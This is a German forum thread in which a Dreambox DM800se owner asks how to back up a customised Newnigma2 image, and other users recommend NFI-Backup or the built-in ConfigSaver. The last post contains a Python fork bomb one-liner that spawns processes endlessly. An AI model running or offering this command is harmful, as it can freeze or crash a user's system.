DM800se Image sichern?

  • DM800se Image sichern?

    Hallo,

    nachdem ich nun bereits mehrfach mühevoll dem aktuellen Newnigma2-Image meine persönlichen Einstellungen aufgedrückt habe, und dafür auch diverse Plugins installiert habe sowie MM-HDD`s gemoutet und eingerichtet habe, möchte ich ein Abbild erstellen, ähnlich wie es Acronis mit Festpaltten macht... Ist das machbar?
    Wäre also schön, wenn ich die persönlicne Einstellungen nicht wieder und wieder erneut erstellen müsste, und das persönliche Image neben dem eigentlich Images auch alle Einstellungen enthalten würde.

    Gruß Dreamer
  • mhm

    SUCHFUNKTION ?


    Der 1000000x Thread über Image Sichern.

    Suche: NFI Backup
    Probleme kann man niemals mit derselben Denkweise lösen.

    ¯\_(ツ)_/¯

    "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • Ich denke, der Verweis auf die Suchfunktion ist um ein Vielfaches mehr vorhanden, als die Frage nach einer Image-Sicherung und m.E. wesentlich nerviger als eine zielgerichtete Antwort - aber das sei nur am Rande erwähnt!
    Die Tatsache, dass das Plugin auf meiner Box keine Sicherung durchführt, weil von Newnigma2 offenbar so gewollt, zwingt mich eh zum Umdenken und dem Aufspielen eines anderen Image... sehr schade! :aufgeben:
  • Das Plugin ist nicht von uns.
    Wir haben aber in den Newnigma Services einen ConfigSaver mit dem kannst du die Plugin-Liste sowie deine Einstellungen sichern und bei bedarf wieder herstellen.
    Das hat den Vorteil das man bei allen neu geflashten Images in sekundenschnelle Plugins und Einstellungen wiederherstellen kann.
    Außerdem hat man die Möglichkeit die Sicherungs.- / Wiederherstellungsoptionen einzeln auszuwählen.

    Aber wenn du lieber so ein schnödes Flash Backup bevorzugst bei dem sich deine Sachen nicht auf neue Images übertragen lassen... *wink*
  • Tja box-dreamer, da hast Du scheinbar nicht nur die Suchfunktion nicht richtig genutzt, sondern zudem auch noch nicht richtig gelesen. ;)
    Ausserdem hast Du auch keinen Blick in die Database geworfen, sonst waere Dir wohl eine NFI-Backup Version fuer das NN² aufgefallen.
    Der bewaehrte und normal Weg seine Konfiguration im NN² Image zu sichern ist aber NICHT ein Image mit dem NFI-Backup zu erstellen, sondern den dafuer vorgesehenen ConfigSaver zu benutzen. Damit ist es moeglich auch neue Versionen des NN² Images mit den eigenen Einstellungen wieder herzustellen.
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • Okay,
    es kann sein, dass ich ziemlich oberflächlich und relativ schnell nach einer pratikablen Lösung gesucht habe... Sicher, das GP3 Backup-Plugin war nicht das Wahre.
    Beruhigend aber zu wissen, dass ein ConfigSaver für die Sicherung bereitsteht. Hier blicke ich als Newbie aber noch nicht durch... Sichern, Plugin-Liste sichern, usw... wo sind die Unterschiede? Muss ich verscheiden Sicherungen vorhalten?
    Zudem stellt sich jetzt die Frage, wie ich dieses GP3 PlugIn wieder entferne, zumal ich es via /tem Offline-Installation eingebunden habe...
    Habe jetzt aber nicht bewußt nach einer Lösung gefragt, wobei ich dennoch an einer Lösung brennend interessiert wäre! :]

    Gruß Dreamer
  • Original von box-dreamer
    Okay,
    es kann sein, dass ich ziemlich oberflächlich und relativ schnell nach einer pratikablen Lösung gesucht habe...


    nicht nur suchen - sondern auch lesen ...

    im Beitrag von @hdfed ist die Lösung versteckt, mit der es klappt ;)

    deinstallieren kannst du das Plugin wie eines, welches online installiert wurde - also auch in der Softwareverwaltung
    Gruß Fred

    Die Dreambox ist tot, es lebe die Dreambox

    ¯\_(ツ)_/¯

    Quellcode

    1. root@dm920:~$ mount | grep "/ "
    2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
    3. root@dm920:~$
  • Thx Fred & hdfed, thx @ all
    So habe ich mir das vorgestellt, die Sicherung verlief zumindest problemlos mit dem modifizierten Plugin, mit dem Wiedereinspielen muss ich wohl aktuell bis Ende "Tatort" warten...
    Ich frage mich allerdings, warum das Sichern zweier Blöcke komfortabler sein soll, als das Sicheren eines Komplettimage?
    Sicherlich, wenn ein Update auf Newnigma2 auf Version 3.1.x ansteht, dann mag es sinnvoll sein, nach erfolgreicher Neuinstallation die Liste der Settinmgs und auch der Plugins einzuspielen.
    Umgekehrt kann ich doch auch das laufende System aktuallisieren um dann wieder ein Komplettimage zu erstellen, sämtliche Einstellungen sollten davon unberührt bleiben...
    Gut zu wissen, dass ich 2 Möglichkeiten habe!

    Gruß Dreamer
  • Ich weiß nicht was daran unkomfortabel sein soll.
    Ich finde das mit dem Flash Backup aber keine gute Lösung.
    Weil du dir mit dem komplett Backup auch möglicherweise wieder alles Kaputte einspielst und ein Update auf ein neues Release nicht immer möglich ist.
    Im laufe der Zeit wird ja immer weiter entwickelt so das selbst alte Settings mal irgendwas zum crashen bringen können.
    Deshalb ist es nur sinnvoll das man die Wiederherstellungsoptionen einzeln wählen kann.
  • ein flashbackup macht aus meiner sicht in drei Situationen Sinn:

    1. vor einem onlineupdate
    wenn das update danebengeht oder wenn etwas in der neuen Version nicht so läuft wie es soll - kommt selten, aber doch vor. Dann kann man das backup.nfi wieder flashen und man hat innerhalb von 5 Minuten sein altes, völlig eingerichtetes und konfiguriertes Image

    2. wenn man gerne herumbastelt
    wenn man Sachen ausprobiert,herumexperimentiert, "image fremde" plugins einbaut etc. kann ein backup gold wert sein

    3. wenn man schnell mal ein anderes Image testen will


    Im Grunde kommt man aber sehr gut mit dem Configurationssaver aus!


    ich ziehe mir mit cron automatisiert alle 2 Tage ein backup auf die hdd - das hat mir schon das eine oder andere Mal Arbeit erspart
    Gruß Fred

    Die Dreambox ist tot, es lebe die Dreambox

    ¯\_(ツ)_/¯

    Quellcode

    1. root@dm920:~$ mount | grep "/ "
    2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
    3. root@dm920:~$

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Fred Bogus Trumper ()

  • Brennt ihr??
    Entweder ihr lest oder ihr lasst es aber das generve mit dem gp3 geht gar net.

    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von sparksofinsanity ()